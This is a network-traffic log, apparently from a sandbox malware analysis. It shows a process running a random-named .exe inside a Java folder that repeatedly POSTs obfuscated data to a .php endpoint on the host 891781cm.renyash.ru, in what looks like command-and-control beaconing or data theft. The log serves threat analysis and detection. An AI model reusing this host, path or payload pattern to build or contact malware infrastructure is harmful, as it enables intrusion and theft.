                                                                                                                  Jan 1, 2025 15:03:47.417375088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:47.596138954 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mqwh9xmBr33p0kZvMGegF0OG0ScJdP%2BCBpxwLpGiri12RfTCBXeebDMz3tvRTiACsRCFaeu8FWm3gXC1r6vh2oc%2Fj0%2Bf%2FHW2uG6gLypwXcCvUA0sQYo1ndzbdBaPIB%2BSCyPnoCi%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e050f9e333c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3354&min_rtt=1971&rtt_var=3506&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=111971&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  134 | 192.168.2.4 | 50141 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:47.715342999 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:48.072340012 CET | 1072 | OUT | Data Raw: 50 54 58 5d 5f 5c 51 55 55 5a 54 59 51 58 55 55 58 53 5c 5d 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PTX]_\QUUZTYQXUUXS\]Y\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?!4[$>>$3-#%,-$/X8>7(+><#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:48.314300060 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:48.489381075 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fo33UWI3mXlhkBr1gsQX4ZmXH6PkxHBKIBzwyop72HCMM4fyS2oDdzFMBPjaXsDQ64ArWaFl8%2FsbNf7c1otLpiwAOVOCnui2NbmaYRpmpw0D6agGicXgdqDbn5k0PFsDuawbC5zS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e0a6c9b4374-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=38921&min_rtt=31269&rtt_var=27030&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=15786&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  135 | 192.168.2.4 | 50142 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:48.767821074 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  136 | 192.168.2.4 | 50143 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:49.100397110 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1772
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:49.447040081 CET | 1772 | OUT | Data Raw: 55 50 58 54 5a 5a 51 5b 55 5a 54 59 51 5c 55 53 58 52 5c 55 59 56 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UPXTZZQ[UZTYQ\USXR\UYVR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X<"4;2%5]*+X'U-$_'?&0<;; ]+R*#^!'^)
                                                                                                                  Jan 1, 2025 15:03:49.546377897 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:49.725451946 CET | 955 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ErVbU8bNcg7XoReymhWw9uEqQ299Eaq2d2y5ByukMqoA%2BztJb3D85lH4MSxCaXyArHU6GT%2BTPmFT6y1cMy4ojU0xDSyEaN4%2Bqt5dzz%2BhHCGgPE1mFkgASUrXLYuVRwaD2DIF3xk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e125edf8c4d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4430&min_rtt=1964&rtt_var=5669&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2116&delivery_rate=67296&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 21 09 27 05 38 04 2b 3e 29 01 2f 3f 37 51 31 2f 26 1a 27 1e 3b 01 31 2d 3e 05 3a 38 24 5a 3f 28 33 5b 25 04 0f 5a 21 21 22 12 32 36 2e 5d 04 1d 25 5b 2a 2a 29 00 2b 2c 39 5f 2a 31 2f 05 27 27 0d 59 26 1a 20 13 33 2d 07 05 21 1c 20 0d 27 55 2f 0e 3c 07 3b 12 33 2d 03 08 20 00 2e 57 0d 12 21 0d 24 3d 36 0a 29 21 27 0c 21 2c 33 52 27 06 37 56 27 2c 38 1d 20 28 22 53 3e 3c 38 5a 22 24 35 54 27 04 3b 59 21 29 26 02 22 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!'8+>)/?7Q1/&';1->:8$Z?(3[%Z!!"26.]%[**)+,9_*1/''Y& 3-! 'U/<;3- .W!$=6)!'!,3R'7V',8 ("S><8Z"$5T';Y!)&"3"T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  137 | 192.168.2.4 | 50144 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:49.417026043 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:49.775430918 CET | 1072 | OUT | Data Raw: 50 56 5d 53 5a 56 54 59 55 5a 54 59 51 52 55 50 58 52 5c 5c 59 51 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PV]SZVTYUZTYQRUPXR\\YQRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(Y1Z ;&&9]=.'0"97$^0?3,-7== )<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:49.861390114 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:50.114057064 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2B6m1MQRzfTWbtopnJ7%2BAqslPwKPEbAKxEc%2FNvDYjHItw3hC%2BnKq%2BxHg6BUu%2BJHn8mhajAdrqcaqT0q43xJPyxBo7PGFScErpKvD2GI7vZi9vEgB2k7H%2Biak1oat2kuCbZZqgsP0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e145b47330c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2728&min_rtt=1979&rtt_var=2241&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=183049&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  138 | 192.168.2.4 | 50145 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:50.250601053 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:50.603333950 CET | 1072 | OUT | Data Raw: 50 55 58 53 5a 58 51 5c 55 5a 54 59 51 5e 55 53 58 58 5c 5b 59 51 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXSZXQ\UZTYQ^USXX\[YQR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <?-!;12X)Z(>$W:,\'?"P3? />'+X?*#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:50.725178957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:50.939637899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:50.981297016 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=51JQNjhQGsYdP9y4cawZg1g9NKgK2Qc%2BoVtUV90uvZyO9h4V5dQ3NicIHyjfZ%2FCjIlxI2Ur4zQmnR5vCA%2BwfZhyyQzc8fThGYi0R%2BpFMLQFgkybzOt%2BaJYV3zswr68OFgk09qkha"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e19bb357ce4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7677&min_rtt=6638&rtt_var=4568&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=97619&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
Jan 1, 2025 15:03:51.068701029 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.4 | 50146 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:51.700609922 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:52.057024002 CET | 1072 | OUT | Data Raw: 55 55 58 54 5a 5e 54 5e 55 5a 54 59 51 5c 55 54 58 59 5c 58 59 5c 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UUXTZ^T^UZTYQ\UTXY\XY\R\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ??.4:$.*-/['B::;35$Z#8-#(>$(,#^!'^)
Jan 1, 2025 15:03:52.176105976 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:52.571722031 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=atA8Uqinr7upNb6ZxIf2KRvxhrBYM4joX%2Frx1iVLk%2F90gBMsKE7hzW%2FBozHBodPLKAijR5N7wNxGsPSURuhWRUKRF2lxm4yg3FlM4jLSwcQSRg65qExH9w7JlMVp84ZGC0Gm28Rg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e22ce017c96-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4454&min_rtt=2173&rtt_var=5377&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=71495&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0
Jan 1, 2025 15:03:52.591917992 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=atA8Uqinr7upNb6ZxIf2KRvxhrBYM4joX%2Frx1iVLk%2F90gBMsKE7hzW%2FBozHBodPLKAijR5N7wNxGsPSURuhWRUKRF2lxm4yg3FlM4jLSwcQSRg65qExH9w7JlMVp84ZGC0Gm28Rg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e22ce017c96-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4454&min_rtt=2173&rtt_var=5377&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=71495&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.4 | 50147 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:52.699769974 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:53.056385994 CET | 1072 | OUT | Data Raw: 55 54 58 54 5f 5b 51 59 55 5a 54 59 51 5c 55 55 58 53 5c 5b 59 57 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXT_[QYUZTYQ\UUXS\[YWR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(Y14;&2Y)#Y$'1:+$>''^;>\=.V(<#^!'^)
Jan 1, 2025 15:03:53.306394100 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:53.589286089 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nv1BP1w00ugxZ3Jp52ZF7U7zTyS0yA0sk%2BDO01y%2BIZO%2Bgi%2Bev4I0jlJphYpHu%2BgraMz1LTlTkokAYhnRY9BhHmsrEilaUqA0uNkchHuqBCX2S9kojlKZgkDCl42hU%2FkR2Z0PUYj1"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e29d91f4302-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8059&min_rtt=6591&rtt_var=5409&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=79598&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.4 | 50148 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:53.713443041 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:54.072056055 CET | 1072 | OUT | Data Raw: 55 57 5d 53 5f 5d 51 59 55 5a 54 59 51 5e 55 50 58 59 5c 55 59 5d 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]S_]QYUZTYQ^UPXY\UY]RY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(/=X Z$>[=>'9.40.$Z,87<(=<#^!'^)3
Jan 1, 2025 15:03:54.277213097 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:54.538604975 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9A50gFz4OKOpy0G%2FkjRsyUTYtrgPUbqfGLDNRqFCWPDdtsaejxFuXhqChOSmNdDRcVIPC%2FPChGoYysAZGg2elTpkGA0kpNB0ch9jZsqBokqDVnwHuGAC9ljZYZmcmymegiLUwwX"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e2ff96c8cda-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4856&min_rtt=2023&rtt_var=6424&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=59140&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.4 | 50149 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:54.672470093 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.4 | 50150 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:54.736490011 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
